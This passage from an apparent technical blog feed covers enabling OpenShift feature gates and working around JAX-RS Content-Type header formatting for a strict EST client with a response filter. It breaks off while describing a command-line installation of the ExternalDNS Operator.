used across the cluster. A cluster administrator can modify
<code>FeatureGate/cluster</code> to vary the feature gates set in the cluster
from the defaults.</p>
<p>The <code>FeatureGate</code> resource is more than a mere list of feature gates
to enable or disable. First, in addition to Kubernetes feature
gates, it can also set feature gates for features in OpenShift
itself, or other components or products in the cluster. Second, it
can refer to named <em>feature sets</em>—groups of feature gates—as an
alternative to explicitly listing all the feature gates to enable or
disable.</p>
<p>For example, the <code>TechPreviewNoUpgrade</code> feature set enables a
collection of features that Red Hat have marked as useful and worthy
of customer <em>testing</em>, with a view to possible promotion to full
support in a future release. Customers do not need to enable
individual feature gates but can instead enable all the <em>Technology
Preview</em> features via the following <code>FeatureGate</code> spec:</p>
<div class="sourceCode" id="cb1"><pre class="sourceCode yaml"><code class="sourceCode yaml"><span id="cb1-1"><a href="#cb1-1" aria-hidden="true" tabindex="-1"></a><span class="fu">apiVersion</span><span class="kw">:</span><span class="at"> config.openshift.io/v1</span></span>
<span id="cb1-2"><a href="#cb1-2" aria-hidden="true" tabindex="-1"></a><span class="fu">kind</span><span class="kw">:</span><span class="at"> FeatureGate</span></span>
<span id="cb1-3"><a href="#cb1-3" aria-hidden="true" tabindex="-1"></a><span class="fu">metadata</span><span class="kw">:</span></span>
<span id="cb1-4"><a href="#cb1-4" aria-hidden="true" tabindex="-1"></a><span class="at">  </span><span class="fu">name</span><span class="kw">:</span><span class="at"> cluster</span></span>
<span id="cb1-5"><a href="#cb1-5" aria-hidden="true" tabindex="-1"></a><span class="fu">spec</span><span class="kw">:</span></span>
<span id="cb1-6"><a href="#cb1-6" aria-hidden="true" tabindex="-1"></a><span class="at">  </span><span class="fu">featureSet</span><span class="kw">:</span><span class="at"> TechPreviewNoUpgrade</span></span></code></pre></div>
<div class="note">
<p>Unlike the more general <code>MachineConfig</code> objects, <code>FeatureGate</code>
objects do not get composed together. Only the single object named
<code>cluster</code> is recognised. So there is no “lightweight” way to enable
all the feature gates from <code>TechPreviewNoUpgrade</code> plus one or two
additional feature gates. To accomplish that, use the
<code>CustomNoUpgrade</code> feature set with <strong>all</strong> the desired feature gates listed.</p>
</div>
<h2 id="enabling-specific-feature-gates">Enabling specific feature gates <a href="#enabling-specific-feature-gates" class="section">§</a></h2>
<p>What if the <code>TechPreviewNoUpgrade</code> feature set does not include the
feature gate you want to enable? The <code>CustomNoUpgrade</code> feature set
allows you to list the specific feature gates you want to enable or
disable. The following example enables the
<code>UserNamespacesStatelessPodsSupport</code> feature gate:</p>
<div class="sourceCode" id="cb2"><pre class="sourceCode yaml"><code class="sourceCode yaml"><span id="cb2-1"><a href="#cb2-1" aria-hidden="true" tabindex="-1"></a><span class="fu">apiVersion</span><span class="kw">:</span><span class="at"> config.openshift.io/v1</span></span>
<span id="cb2-2"><a href="#cb2-2" aria-hidden="true" tabindex="-1"></a><span class="fu">kind</span><span class="kw">:</span><span class="at"> FeatureGate</span></span>
<span id="cb2-3"><a href="#cb2-3" aria-hidden="true" tabindex="-1"></a><span class="fu">metadata</span><span class="kw">:</span></span>
<span id="cb2-4"><a href="#cb2-4" aria-hidden="true" tabindex="-1"></a><span class="at">  </span><span class="fu">name</span><span class="kw">:</span><span class="at"> cluster</span></span>
<span id="cb2-5"><a href="#cb2-5" aria-hidden="true" tabindex="-1"></a><span class="fu">spec</span><span class="kw">:</span></span>
<span id="cb2-6"><a href="#cb2-6" aria-hidden="true" tabindex="-1"></a><span class="at">  </span><span class="fu">featureSet</span><span class="kw">:</span><span class="at"> CustomNoUpgrade</span></span>
<span id="cb2-7"><a href="#cb2-7" aria-hidden="true" tabindex="-1"></a><span class="at">  </span><span class="fu">customNoUpgrade</span><span class="kw">:</span></span>
<span id="cb2-8"><a href="#cb2-8" aria-hidden="true" tabindex="-1"></a><span class="at">    </span><span class="fu">enabled</span><span class="kw">:</span></span>
<span id="cb2-9"><a href="#cb2-9" aria-hidden="true" tabindex="-1"></a><span class="at">    </span><span class="kw">-</span><span class="at"> UserNamespacesStatelessPodsSupport</span></span></code></pre></div>
<h2 id="applying-featuregate-changes">Applying <code>FeatureGate</code> changes <a href="#applying-featuregate-changes" class="section">§</a></h2>
<p>When you change <code>FeatureGate/cluster</code>, new <code>MachineConfig</code> objects
get generated containing updated configurations of the relevant
Kubernetes and OpenShift components (e.g. <em>kubelet</em>). Machine
Config Operator will progressively update and restart the nodes in
the cluster, while ensuring availability.</p>
<p>Let’s see an example. First, observe that all <code>MachineConfigPool</code>s
are up to date (<code>ready</code> count = machine <code>count</code>):</p>
<pre class="shell"><code>% oc get MachineConfigPool -o json | jq --compact-output \
    &#39;.items[] | { name: .metadata.name
                , count: .status.machineCount
                , ready: .status.readyMachineCount}&#39;
{&quot;name&quot;:&quot;master&quot;,&quot;count&quot;:3,&quot;ready&quot;:3}
{&quot;name&quot;:&quot;worker&quot;,&quot;count&quot;:3,&quot;ready&quot;:3}</code></pre>
<p>Also observe that the <code>FeatureGate/cluster</code> object does exist, but
its spec is empty (so the default feature gate settings are used):</p>
<pre class="shell"><code>% oc get -o json FeatureGate/cluster | jq .spec
{}</code></pre>
<p>Now update the <code>FeatureGate/cluster</code> object. Assume the
<code>CustomNoUpgrade</code> configuration shown earlier resides in a file
named <code>featuregate-userns.yaml</code>.</p>
<pre class="shell"><code>% oc replace -f featuregate-userns.yaml
featuregate.config.openshift.io/cluster replaced</code></pre>
<p>After a few moments, Machine Config Operator will observe the new
configuration and start updating and restarting the nodes.
Initially, all pools have zero machines in state <code>ready</code> (because
they all need updating):</p>
<pre class="shell"><code>% oc get MachineConfigPool -o json | jq --compact-output \
    &#39;.items[] | { name: .metadata.name
                , count: .status.machineCount
                , ready: .status.readyMachineCount}&#39;
{&quot;name&quot;:&quot;master&quot;,&quot;count&quot;:3,&quot;ready&quot;:0}
{&quot;name&quot;:&quot;worker&quot;,&quot;count&quot;:3,&quot;ready&quot;:0}</code></pre>
<p>After some period of time (which will vary by cluster size), all the
nodes will have received the updated configuration and restarted.</p>
<p>As for verifying that the updates were applied correctly, that will
depend on which gates are being enabled or disabled. It is out of
scope for this article. But in terms of <em>how</em> to set feature gates
in OpenShift, I hope that this article has conveyed it clearly and
that it will be useful to others.</p>
<p>For further detail, see the official OpenShift <a href="https://docs.openshift.com/container-platform/4.12/nodes/clusters/nodes-cluster-enabling-features.html"><code>FeatureGate</code>
documentation</a> and <a href="https://docs.openshift.com/container-platform/4.12/rest_api/config_apis/featuregate-config-openshift-io-v1.html"><code>FeatureGate</code> object
schema</a>.</p>]]></summary>
</entry>
<entry>
    <title>Controlling header formatting in JAX-RS applications</title>
    <link href="https://frasertweedale.github.io/blog-redhat/posts/2022-08-29-jax-rs-header-formatting.html" />
    <id>https://frasertweedale.github.io/blog-redhat/posts/2022-08-29-jax-rs-header-formatting.html</id>
    <published>2022-08-29T00:00:00Z</published>
    <updated>2022-08-29T00:00:00Z</updated>
    <summary type="html"><![CDATA[<h1 id="controlling-header-formatting-in-jax-rs-applications">Controlling header formatting in JAX-RS applications</h1>
<p>I’ve been implementing an <a href="https://www.rfc-editor.org/rfc/rfc7030"><em>Enrollment over Secure Transport
(EST)</em></a> service in Dogtag PKI. During testing, I found
that a notable client implementation parses the response
<code>Content-Type</code> header in the following way:</p>
<div class="sourceCode" id="cb1"><pre class="sourceCode c"><code class="sourceCode c"><span id="cb1-1"><a href="#cb1-1" aria-hidden="true" tabindex="-1"></a><span class="cf">if</span> <span class="op">(!</span>strncmp<span class="op">(</span></span>
<span id="cb1-2"><a href="#cb1-2" aria-hidden="true" tabindex="-1"></a>    multipart_get_data_content_type<span class="op">(</span>parser<span class="op">),</span></span>
<span id="cb1-3"><a href="#cb1-3" aria-hidden="true" tabindex="-1"></a>    <span class="st">&quot;application/pkcs7-mime; smime-type=certs-only&quot;</span><span class="op">,</span></span>
<span id="cb1-4"><a href="#cb1-4" aria-hidden="true" tabindex="-1"></a>    <span class="dv">45</span><span class="op">)</span></span>
<span id="cb1-5"><a href="#cb1-5" aria-hidden="true" tabindex="-1"></a>  <span class="op">)</span> <span class="op">{</span></span>
<span id="cb1-6"><a href="#cb1-6" aria-hidden="true" tabindex="-1"></a>    <span class="op">...</span></span></code></pre></div>
<p>The Dogtag EST service is a <a href="https://projects.eclipse.org/projects/ee4j.rest"><em>Jakarta RESTful Web Services
(JAX-RS)</em></a> application. It produces a <code>Content-Type</code> header
value different from what the client expects (note the lack of
whitespace):</p>
<pre><code>application/pkcs7-mime;smime-type=certs-only</code></pre>
<p>As a consequence, the EST client fails to process the response.
This is certainly a defect in the EST client implementation. But
EST is used by many embedded or hard-to-update network devices, and
updates might not be available (now, or <em>ever</em>).</p>
<p>So, I needed to find a way to override the default header
formatting. This blog post describes my solution.</p>
<h2 id="specifying-the-content-type-header">Specifying the <code>Content-Type</code> header <a href="#specifying-the-content-type-header" class="section">§</a></h2>
<p>The JAX-RS <code>@Produces</code> annotation specifies the <code>Content-Type</code>
header value for a particular resource:</p>
<div class="sourceCode" id="cb3"><pre class="sourceCode java"><code class="sourceCode java"><span id="cb3-1"><a href="#cb3-1" aria-hidden="true" tabindex="-1"></a><span class="at">@POST</span></span>
<span id="cb3-2"><a href="#cb3-2" aria-hidden="true" tabindex="-1"></a><span class="at">@Path</span><span class="op">(</span><span class="st">&quot;simpleenroll&quot;</span><span class="op">)</span></span>
<span id="cb3-3"><a href="#cb3-3" aria-hidden="true" tabindex="-1"></a><span class="at">@Consumes</span><span class="op">(</span><span class="st">&quot;application/pkcs10&quot;</span><span class="op">)</span></span>
<span id="cb3-4"><a href="#cb3-4" aria-hidden="true" tabindex="-1"></a><span class="at">@Produces</span><span class="op">(</span><span class="st">&quot;application/pkcs7-mime; smime-type=certs-only&quot;</span><span class="op">)</span></span>
<span id="cb3-5"><a href="#cb3-5" aria-hidden="true" tabindex="-1"></a><span class="kw">public</span> <span class="bu">Response</span> <span class="fu">simpleenroll</span><span class="op">(</span><span class="dt">byte</span><span class="op">[]</span> data<span class="op">)</span> <span class="op">{</span></span>
<span id="cb3-6"><a href="#cb3-6" aria-hidden="true" tabindex="-1"></a>    <span class="kw">...</span></span></code></pre></div>
<p>Note that the string value is not used <em>verbatim</em>. Instead, it is
parsed into a <a href="https://docs.oracle.com/javaee/7/api/javax/ws/rs/core/MediaType.html"><code>MediaType</code></a> value and stored as such in
the response headers (a <code>MultivaluedMap&lt;String, Object&gt;</code>).</p>
<p>When serialising the <code>Response</code>, header values are stringified via
types that implement the
<a href="https://docs.oracle.com/javaee/7/api/javax/ws/rs/ext/RuntimeDelegate.HeaderDelegate.html"><code>RuntimeDelegate.HeaderDelegate&lt;T&gt;</code></a> interface,
where <code>T</code> is the real type of the header value <code>Object</code>. To
serialise a <code>MediaType</code> header value, the JAX-RS machinery uses an
instance of a class that implements
<code>RuntimeDelegate.HeaderDelegate&lt;MediaType&gt;</code>.</p>
<p><code>HeaderDelegate</code> <em>implementations</em> are not part of the JAX-RS API.
They are provided by the JAX-RS implementation. In Dogtag PKI,
that’s <a href="https://resteasy.dev/">RESTEasy</a>. The class in question is:</p>
<div class="sourceCode" id="cb4"><pre class="sourceCode java"><code class="sourceCode java"><span id="cb4-1"><a href="#cb4-1" aria-hidden="true" tabindex="-1"></a><span class="kw">public</span> <span class="kw">class</span> MediaTypeHeaderDelegate</span>
<span id="cb4-2"><a href="#cb4-2" aria-hidden="true" tabindex="-1"></a>  <span class="kw">implements</span> RuntimeDelegate<span class="op">.</span><span class="fu">HeaderDelegate</span><span class="op">&lt;</span>MediaType<span class="op">&gt;</span> <span class="op">{</span></span></code></pre></div>
<p>The <code>toString(MediaType type)</code> method provided by this class prints
the value without a space character between the subtype and the
parameters. For the example resource above, it produces the string:</p>
<pre><code>application/pkcs7-mime;smime-type=certs-only</code></pre>
<p>This is a legal production in the HTTP grammar, according to <a href="https://www.rfc-editor.org/rfc/rfc7230#section-3.2.3">RFC
7230</a> and <a href="https://www.rfc-editor.org/rfc/rfc7231#section-3.1.1.1">RFC 7231</a>:</p>
<pre><code>media-type = type &quot;/&quot; subtype *( OWS &quot;;&quot; OWS parameter )
OWS = *( SP / HTAB )</code></pre>
<p>However, we already saw that at least one EST client is unable to
process this value, because it expects a space character before the
parameters:</p>
<pre><code>application/pkcs7-mime; smime-type=certs-only</code></pre>
<p>This is also a legal production. But the client is using <code>strncmp</code>
to look for this exact string, instead of properly parsing the
value. If we can’t fix the client behaviour, we have to find a
workaround on the server to produce the exact string the client
expects.</p>
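<p>For contrast, a tolerant comparison might look something like the
following. This is only a minimal sketch in Java, not the EST
client’s code (which is C). The class and method names are
hypothetical, and for brevity it does not handle quoted-string
parameter values.</p>
<div class="sourceCode"><pre class="sourceCode java"><code class="sourceCode java">import java.util.Locale;
import java.util.Map;
import java.util.TreeMap;

// Hypothetical helper: compares media types by structure, not by exact text.
final class MediaTypeCompare {

  // Reduce &quot;type/subtype *( OWS ; OWS parameter )&quot; to a canonical form:
  // lower-cased type/subtype, then parameters sorted by lower-cased name.
  // Simplification: quoted-string parameter values are not handled.
  static String canonical(String header) {
    String[] parts = header.split(&quot;;&quot;);
    // trim() removes both SP and HTAB, i.e. the OWS in the grammar.
    String type = parts[0].trim().toLowerCase(Locale.ROOT);
    Map&lt;String, String&gt; params = new TreeMap&lt;&gt;();
    for (int i = 1; i &lt; parts.length; i++) {
      String p = parts[i].trim();
      int eq = p.indexOf(&#39;=&#39;);
      if (eq &gt; 0)
        params.put(p.substring(0, eq).toLowerCase(Locale.ROOT),
                   p.substring(eq + 1));
    }
    StringBuilder sb = new StringBuilder(type);
    params.forEach((k, v) -&gt; sb.append(&#39;;&#39;).append(k).append(&#39;=&#39;).append(v));
    return sb.toString();
  }

  // True when both header values denote the same media type and parameters.
  static boolean sameMediaType(String a, String b) {
    return canonical(a).equals(canonical(b));
  }
}</code></pre></div>
<p>With a comparison along these lines, the two spellings of the
<code>Content-Type</code> value shown above would be treated as equal.</p>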
<h2 id="idea-1-custom-headerdelegate">Idea 1: custom <code>HeaderDelegate</code> <a href="#idea-1-custom-headerdelegate" class="section">§</a></h2>
<p>My first idea was to override the <code>HeaderDelegate&lt;MediaType&gt;</code> with
our own implementation. I couldn’t find a general way to do that
via the JAX-RS API. It does seem that you can do it using RESTEasy
classes directly:</p>
<ol type="1">
<li>Implement the custom <code>HeaderDelegate&lt;MediaType&gt;</code>. To avoid
unnecessary work you could extend RESTEasy’s
<code>MediaTypeHeaderDelegate</code> and override just the
<code>toString(MediaType)</code> method.</li>
<li>Obtain <code>ResteasyProviderFactory.getInstance()</code>. Invoke
<code>.addHeaderDelegate(MediaType.class, customInst)</code> to replace the
<code>HeaderDelegate&lt;MediaType&gt;</code>.</li>
</ol>
<p>This approach has several disadvantages:</p>
<ul>
<li>Directly coupled to the RESTEasy implementation. May break if
RESTEasy implementation details change and will not work with
other JAX-RS implementations.</li>
<li>Need to implement a custom <code>HeaderDelegate&lt;MediaType&gt;</code> with the
“correct” serialisation behaviour.</li>
<li><strong>The “correct” serialisation behaviour might break <em>other</em> clients
with different bugs/quirks.</strong></li>
</ul>
<p>For these reasons I rejected the first idea and sought an approach
that avoids these disadvantages.</p>
<h2 id="idea-2-response-filter">Idea 2: response filter <a href="#idea-2-response-filter" class="section">§</a></h2>
<p>My next idea was to use a <em>response filter</em> to reformat the
<code>Content-Type</code> response header. The JAX-RS API defines the
<a href="https://docs.oracle.com/javaee/7/api/javax/ws/rs/container/ContainerResponseFilter.html"><code>ContainerResponseFilter</code></a> interface:</p>
<div class="sourceCode" id="cb8"><pre class="sourceCode java"><code class="sourceCode java"><span id="cb8-1"><a href="#cb8-1" aria-hidden="true" tabindex="-1"></a><span class="kw">public</span> <span class="kw">interface</span> ContainerResponseFilter <span class="op">{</span></span>
<span id="cb8-2"><a href="#cb8-2" aria-hidden="true" tabindex="-1"></a>  <span class="dt">void</span> <span class="fu">filter</span><span class="op">(</span></span>
<span id="cb8-3"><a href="#cb8-3" aria-hidden="true" tabindex="-1"></a>      ContainerRequestContext requestContext<span class="op">,</span></span>
<span id="cb8-4"><a href="#cb8-4" aria-hidden="true" tabindex="-1"></a>      ContainerResponseContext responseContext<span class="op">)</span></span>
<span id="cb8-5"><a href="#cb8-5" aria-hidden="true" tabindex="-1"></a>    <span class="kw">throws</span> <span class="bu">IOException</span><span class="op">;</span></span>
<span id="cb8-6"><a href="#cb8-6" aria-hidden="true" tabindex="-1"></a><span class="op">}</span></span></code></pre></div>
<p>The application applies each registered filter to each response,
before serialising and sending the response. At the time response
filters are applied, the <code>Content-Type</code> header value is a
<code>MediaType</code>. It has not yet been converted to a <code>String</code>.</p>
<p>A response filter can add, remove, or replace response headers.
Recall that headers are stored in a <code>MultivaluedMap&lt;String, Object&gt;</code>. This means that we can replace a <code>MediaType</code> value (whose
serialisation is determined by the <code>HeaderDelegate</code>) with a <code>String</code>
value (which will be written <em>as is</em>).</p>
<p>The <code>.equals</code> equality test for <code>MediaType</code> properly compares the
properties of the instance without regard to string representation.
As it should. This enables a succinct implementation where we:</p>
<ol type="1">
<li>Declare <em>verbatim</em> <code>String</code> header values we want to see in the
response.</li>
<li>Parse those strings into <code>MediaType</code> values.</li>
<li>Match the <code>Content-Type</code> value in the response against parsed
values.</li>
<li>Replace matched header values with the corresponding <em>verbatim</em>
<code>String</code>.</li>
</ol>
<p>The implementation is straightforward:</p>
<div class="sourceCode" id="cb9"><pre class="sourceCode java"><code class="sourceCode java"><span id="cb9-1"><a href="#cb9-1" aria-hidden="true" tabindex="-1"></a><span class="at">@Provider</span></span>
<span id="cb9-2"><a href="#cb9-2" aria-hidden="true" tabindex="-1"></a><span class="kw">public</span> <span class="kw">class</span> ReformatContentTypeResponseFilter</span>
<span id="cb9-3"><a href="#cb9-3" aria-hidden="true" tabindex="-1"></a>    <span class="kw">implements</span> ContainerResponseFilter <span class="op">{</span></span>
<span id="cb9-4"><a href="#cb9-4" aria-hidden="true" tabindex="-1"></a></span>
<span id="cb9-5"><a href="#cb9-5" aria-hidden="true" tabindex="-1"></a>  <span class="kw">private</span> <span class="dt">static</span> <span class="bu">String</span><span class="op">[]</span> verbatim <span class="op">=</span> <span class="op">{</span></span>
<span id="cb9-6"><a href="#cb9-6" aria-hidden="true" tabindex="-1"></a>    <span class="st">&quot;application/pkcs7-mime; smime-type=certs-only&quot;</span></span>
<span id="cb9-7"><a href="#cb9-7" aria-hidden="true" tabindex="-1"></a>  <span class="op">};</span></span>
<span id="cb9-8"><a href="#cb9-8" aria-hidden="true" tabindex="-1"></a></span>
<span id="cb9-9"><a href="#cb9-9" aria-hidden="true" tabindex="-1"></a>  <span class="kw">private</span> <span class="dt">static</span> <span class="bu">HashMap</span><span class="op">&lt;</span>MediaType<span class="op">,</span> <span class="bu">String</span><span class="op">&gt;</span> substitutions <span class="op">=</span></span>
<span id="cb9-10"><a href="#cb9-10" aria-hidden="true" tabindex="-1"></a>    <span class="kw">new</span> <span class="bu">HashMap</span><span class="op">&lt;&gt;();</span></span>
<span id="cb9-11"><a href="#cb9-11" aria-hidden="true" tabindex="-1"></a></span>
<span id="cb9-12"><a href="#cb9-12" aria-hidden="true" tabindex="-1"></a>  <span class="dt">static</span> <span class="op">{</span></span>
<span id="cb9-13"><a href="#cb9-13" aria-hidden="true" tabindex="-1"></a>    <span class="cf">for</span> <span class="op">(</span><span class="bu">String</span> s <span class="op">:</span> verbatim<span class="op">)</span></span>
<span id="cb9-14"><a href="#cb9-14" aria-hidden="true" tabindex="-1"></a>      substitutions<span class="op">.</span><span class="fu">put</span><span class="op">(</span>MediaType<span class="op">.</span><span class="fu">valueOf</span><span class="op">(</span>s<span class="op">),</span> s<span class="op">);</span></span>
<span id="cb9-15"><a href="#cb9-15" aria-hidden="true" tabindex="-1"></a>  <span class="op">}</span></span>
<span id="cb9-16"><a href="#cb9-16" aria-hidden="true" tabindex="-1"></a></span>
<span id="cb9-17"><a href="#cb9-17" aria-hidden="true" tabindex="-1"></a>  <span class="at">@Override</span></span>
<span id="cb9-18"><a href="#cb9-18" aria-hidden="true" tabindex="-1"></a>  <span class="kw">public</span> <span class="dt">void</span> <span class="fu">filter</span><span class="op">(</span></span>
<span id="cb9-19"><a href="#cb9-19" aria-hidden="true" tabindex="-1"></a>      ContainerRequestContext requestContext<span class="op">,</span></span>
<span id="cb9-20"><a href="#cb9-20" aria-hidden="true" tabindex="-1"></a>      ContainerResponseContext responseContext<span class="op">)</span> <span class="op">{</span></span>
<span id="cb9-21"><a href="#cb9-21" aria-hidden="true" tabindex="-1"></a>    MultivaluedMap<span class="op">&lt;</span><span class="bu">String</span><span class="op">,</span> <span class="bu">Object</span><span class="op">&gt;</span> headers <span class="op">=</span></span>
<span id="cb9-22"><a href="#cb9-22" aria-hidden="true" tabindex="-1"></a>      responseContext<span class="op">.</span><span class="fu">getHeaders</span><span class="op">();</span></span>
<span id="cb9-23"><a href="#cb9-23" aria-hidden="true" tabindex="-1"></a>    <span class="bu">Object</span> v <span class="op">=</span> headers<span class="op">.</span><span class="fu">getFirst</span><span class="op">(</span>HttpHeaders<span class="op">.</span><span class="fu">CONTENT_TYPE</span><span class="op">);</span></span>
<span id="cb9-24"><a href="#cb9-24" aria-hidden="true" tabindex="-1"></a>    <span class="cf">if</span> <span class="op">(</span>v <span class="op">!=</span> <span class="kw">null</span> <span class="op">&amp;&amp;</span> v <span class="kw">instanceof</span> MediaType</span>
<span id="cb9-25"><a href="#cb9-25" aria-hidden="true" tabindex="-1"></a>        <span class="op">&amp;&amp;</span> substitutions<span class="op">.</span><span class="fu">containsKey</span><span class="op">(</span>v<span class="op">))</span> <span class="op">{</span></span>
<span id="cb9-26"><a href="#cb9-26" aria-hidden="true" tabindex="-1"></a>      headers<span class="op">.</span><span class="fu">putSingle</span><span class="op">(</span></span>
<span id="cb9-27"><a href="#cb9-27" aria-hidden="true" tabindex="-1"></a>        HttpHeaders<span class="op">.</span><span class="fu">CONTENT_TYPE</span><span class="op">,</span> substitutions<span class="op">.</span><span class="fu">get</span><span class="op">(</span>v<span class="op">));</span></span>
<span id="cb9-28"><a href="#cb9-28" aria-hidden="true" tabindex="-1"></a>    <span class="op">}</span></span>
<span id="cb9-29"><a href="#cb9-29" aria-hidden="true" tabindex="-1"></a>  <span class="op">}</span></span>
<span id="cb9-30"><a href="#cb9-30" aria-hidden="true" tabindex="-1"></a></span>
<span id="cb9-31"><a href="#cb9-31" aria-hidden="true" tabindex="-1"></a><span class="op">}</span></span></code></pre></div>
<p>There is currently only one header value whose formatting I need to
precisely control. If we discover more, we only need to add the
desired string serialisation to the <code>verbatim</code> array.</p>
<p>We must consider the possible scenario of different clients with
different quirks. In that case, we could maintain separate
substitutions maps for each known problematic client. We would use
the <code>User-Agent</code> header, or other request characteristics, to
identify the client and select the corresponding substitution map
(if any). Hopefully this situation does not arise. But if it does,
the increase in complexity of the solution is tolerable.</p>
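<p>A rough sketch of that selection logic follows. It is plain Java
with no JAX-RS types so that it stands alone. The class name and the
client name <code>quirky-est-client</code> are invented for illustration. In
the real filter the inner map keys would be <code>MediaType</code> values, and
the <code>User-Agent</code> value could be read with
<code>requestContext.getHeaderString(HttpHeaders.USER_AGENT)</code>.</p>
<div class="sourceCode"><pre class="sourceCode java"><code class="sourceCode java">import java.util.LinkedHashMap;
import java.util.Map;

// Hypothetical sketch: choose a substitution map per client.
final class ClientQuirks {

  // User-Agent substring -&gt; (serialised value -&gt; verbatim replacement).
  private static final Map&lt;String, Map&lt;String, String&gt;&gt; BY_CLIENT =
      new LinkedHashMap&lt;&gt;();

  static {
    // &quot;quirky-est-client&quot; is an invented name, not a real product.
    BY_CLIENT.put(&quot;quirky-est-client&quot;, Map.of(
        &quot;application/pkcs7-mime;smime-type=certs-only&quot;,
        &quot;application/pkcs7-mime; smime-type=certs-only&quot;));
  }

  // Return the substitutions for this client, or an empty map when the
  // client is unknown (its responses are then left untouched).
  static Map&lt;String, String&gt; substitutionsFor(String userAgent) {
    if (userAgent != null)
      for (Map.Entry&lt;String, Map&lt;String, String&gt;&gt; e : BY_CLIENT.entrySet())
        if (userAgent.contains(e.getKey()))
          return e.getValue();
    return Map.of();
  }
}</code></pre></div>
<p>Matching on a <code>User-Agent</code> substring is only one possible choice. Any
request characteristic that reliably identifies the client would do.</p>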
<p>This solution works well and avoids the disadvantages of my first
idea:</p>
<ul>
<li>Only uses official Servlet and JAX-RS classes and interfaces.
This solution will work across all JAX-RS implementations.</li>
<li>Does not (re)implement <code>MediaType</code> serialisation. You just declare
the exact string values you want to see in responses.</li>
<li>With a moderate increase in complexity, can handle different
clients with incompatible quirks.</li>
</ul>
<h2 id="conclusion">Conclusion <a href="#conclusion" class="section">§</a></h2>
<p>It’s unfortunate that this workaround was even necessary. But given
that it was, I’m happy with the solution. It is simple and portable
across Servlet and JAX-RS implementations.</p>
<p>The same approach could be used for controlling formatting of any
header value types, not just <code>Content-Type</code> / <code>MediaType</code>. I hope
that sharing this solution will help people who encounter similar
problems. At the very least, I hope that because of this post you
learned something about Servlet and JAX-RS response header
processing.</p>]]></summary>
</entry>
<entry>
    <title>Experimenting with ExternalDNS</title>
    <link href="https://frasertweedale.github.io/blog-redhat/posts/2022-03-24-k8s-external-dns.html" />
    <id>https://frasertweedale.github.io/blog-redhat/posts/2022-03-24-k8s-external-dns.html</id>
    <published>2022-03-24T00:00:00Z</published>
    <updated>2022-03-24T00:00:00Z</updated>
    <summary type="html"><![CDATA[<h1 id="experimenting-with-externaldns">Experimenting with ExternalDNS</h1>
<p>DNS is a critical piece of the puzzle for exposing Kubernetes-hosted
applications to the Internet. Running the application means nothing
if you can’t get traffic to it. Keeping public DNS records in sync
with the deployed applications is important. The Kubernetes
<a href="https://github.com/kubernetes-sigs/external-dns">ExternalDNS</a> project was developed for this purpose.</p>
<p>ExternalDNS exposes Kubernetes Services and Routes by managing
records in external DNS providers. It <a href="https://github.com/kubernetes-sigs/external-dns/blob/570b51659fdc218281e3504a558a437178465f29/README.md#status-of-providers">supports many DNS
providers</a>, including the DNS services of the popular
cloud providers (AWS, Google Cloud, Azure, …).</p>
<p>I have been experimenting with ExternalDNS. My purpose is not only
to understand installation and basic usage, but also whether it can
meet the specific DNS requirements of FreeIPA, such as <code>SRV</code>
records. This post outlines my findings.</p>
<h2 id="operator-installation">Operator installation <a href="#operator-installation" class="section">§</a></h2>
<p>The <a href="https://github.com/kubernetes-sigs/external-dns">ExternalDNS</a> controller is a Kubernetes sub-project (or
SIG—<em>special interest group</em>). In the OpenShift ecosystem, the
<a href="https://github.com/openshift/external-dns-operator">ExternalDNS Operator</a> creates and manages ExternalDNS controller
instances defined by <em>custom resources</em> (CRs) of <code>kind: ExternalDNS</code>.</p>
<p>The ExternalDNS Operator is available as a <em>Tech Preview</em> in
OpenShift Container Platform 4.10. So, it is visible in the
<em>OperatorHub</em> catalogue out-of-the-box. The <a href="https://docs.openshift.com/container-platform/4.10/networking/external_dns_operator/nw-installing-external-dns-operator.html">official docs</a>
explain how to install the operator via the OperatorHub web console.
The instructions were easy to follow.</p>
<p>I prefer using the CLI where possible. The OperatorHub system is
complex but I eventually worked out what commands and objects are
needed to install the ExternalDNS Operator from the CLI.</p>
<p>First, create the <em>operand</em> namespace and RBAC objects. The
operand namespace is where the ExternalDNS controllers (as opposed
to the ExternalDNS <em>Operator</em> controller) will live.</p>
<pre class="shell"><code>% oc create ns external-dns
namespace/external-dns created

% oc apply -f \
    https://raw.githubusercontent.com/openshift/external-dns-operator/release-0.1/config/rbac/extra-roles.yaml
role.rbac.authorization.k8s.io/external-dns-operator created
rolebinding.rbac.authorization.k8s.io/external-dns-operator created
clusterrole.rbac.authorization.k8s.io/external-dns created
clusterrolebinding.rbac.authorization.k8s.io/external-dns created</code></pre>
<p>Next, create the <code>external-dns-operator</code> namespace where the
operator itself shall live:</p>
<pre class="shell"><code>% oc create ns external-dns-operator
namespace/external-dns-operator created</code></pre>
<p>Finally, create the OperatorGroup and OperatorHub Subscription
objects. Note the contents of <code>external-dns-operator.yaml</code>:</p>
<div class="sourceCode" id="cb3"><pre class="sourceCode yaml"><code class="sourceCode yaml"><span id="cb3-1"><a href="#cb3-1" aria-hidden="true" tabindex="-1"></a><span class="fu">apiVersion</span><span class="kw">:</span><span class="at"> operators.coreos.com/v1</span></span>
<span id="cb3-2"><a href="#cb3-2" aria-hidden="true" tabindex="-1"></a><span class="fu">kind</span><span class="kw">:</span><span class="at"> OperatorGroup</span></span>
<span id="cb3-3"><a href="#cb3-3" aria-hidden="true" tabindex="-1"></a><span class="fu">metadata</span><span class="kw">:</span></span>
<span id="cb3-4"><a href="#cb3-4" aria-hidden="true" tabindex="-1"></a><span class="at">  </span><span class="fu">generateName</span><span class="kw">:</span><span class="at"> external-dns-operator-</span></span>
<span id="cb3-5"><a href="#cb3-5" aria-hidden="true" tabindex="-1"></a><span class="at">  </span><span class="fu">namespace</span><span class="kw">:</span><span class="at"> external-dns-operator</span></span>
<span id="cb3-6"><a href="#cb3-6" aria-hidden="true" tabindex="-1"></a><span class="fu">spec</span><span class="kw">:</span></span>
<span id="cb3-7"><a href="#cb3-7" aria-hidden="true" tabindex="-1"></a><span class="at">  </span><span class="fu">targetNamespaces</span><span class="kw">:</span></span>
<span id="cb3-8"><a href="#cb3-8" aria-hidden="true" tabindex="-1"></a><span class="at">  </span><span class="kw">-</span><span class="at"> external-dns-operator</span></span>
<span id="cb3-9"><a href="#cb3-9" aria-hidden="true" tabindex="-1"></a><span class="pp">---</span></span>
<span id="cb3-10"><a href="#cb3-10" aria-hidden="true" tabindex="-1"></a><span class="fu">apiVersion</span><span class="kw">:</span><span class="at"> operators.coreos.com/v1alpha1</span></span>
